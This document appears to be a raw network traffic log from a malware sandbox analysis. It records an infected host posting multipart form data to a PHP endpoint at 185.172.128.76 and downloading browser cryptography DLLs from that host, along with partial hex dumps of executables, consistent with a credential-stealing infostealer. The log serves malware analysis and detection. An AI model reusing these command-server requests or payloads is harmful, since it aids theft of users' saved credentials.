                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: *0@< .text%&`P`.data|'@(,@`.rdatapDpFT@`@.bss(`.edata*,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.540201902 CEST1289INData Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00
                                                                                                                                                                                                                                    Data Ascii: @B/81s:<R@B/92P @B
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.540251017 CEST1289INData Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89
                                                                                                                                                                                                                                    Data Ascii: +C|$\$4$w#t|$\$4$u#u|$D$4$t&up|$D$4$rZ|$D$4$Q|$D$4$*|$D$4$s|$D$4$
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.540326118 CEST1289INData Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a
                                                                                                                                                                                                                                    Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:17.540375948 CEST1289INData Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75
                                                                                                                                                                                                                                    Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:27.378573895 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----CFBFCGIDAKECGCBGDBAF
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 4599
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:27.686438084 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:27 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:27.794853926 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----DBFHDHJKKJDHJJJJKEGH
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1451
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:28.099020004 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:28 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:28.211787939 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AKKEGHJDHDAFHIDHCFHD
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 47 48 4a 44 48 44 41 46 48 49 44 48 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: ------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------AKKEGHJDHDAFHIDHCFHDContent-Disposition: form-data; name="file"------AKKEGHJDHDAFHIDHCFHD--
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:28.522394896 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:28 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:31.288098097 CEST560OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGI
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 359
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 66 35 37 36 63 63 62 64 30 31 30 64 35 64 62 37 64 31 61 33 32 35 36 31 63 39 66 31 36 63 36 64 34 64 62 62 33 39 66 62 65 30 39 62 63 36 33 63 35 63 38 37 38 64 65 36 33 30 34 36 34 33 64 36 34 65 36 31 66 62 38 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"8f576ccbd010d5db7d1a32561c9f16c6d4dbb39fbe09bc63c5c878de6304643d64e61fb8------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:31.591976881 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:31 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:31.789865017 CEST93OUTGET /15f649199f40275b/freebl3.dll HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:32.070154905 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:31 GMT
                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                    Content-Length: 685392
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    ETag: "a7550-5e7e950876500"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:36.229562998 CEST93OUTGET /15f649199f40275b/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:36.512185097 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:36 GMT
                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                    Content-Length: 608080
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:39.473526955 CEST94OUTGET /15f649199f40275b/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:39.753586054 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:39 GMT
                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                    Content-Length: 450024
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:41.982009888 CEST90OUTGET /15f649199f40275b/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:31:42.261235952 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:31:42 GMT
                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                    Content-Length: 2046288
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:00.918885946 CEST94OUTGET /15f649199f40275b/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:01.198822021 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:01 GMT
                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                    Content-Length: 257872
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:02.654565096 CEST98OUTGET /15f649199f40275b/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:02.935641050 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:02 GMT
                                                                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                    Content-Length: 80880
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                    ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B [TRUNCATED]
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:05.949537039 CEST202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----KJJJJDHIDBGHIDHIDAFB
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 1067
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:06.258733034 CEST170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                    Date: Fri, 26 Apr 2024 23:32:06 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                    Apr 27, 2024 01:32:06.365636110 CEST468OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKF
                                                                                                                                                                                                                                    Host: 185.172.128.76
                                                                                                                                                                                                                                    Content-Length: 267
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
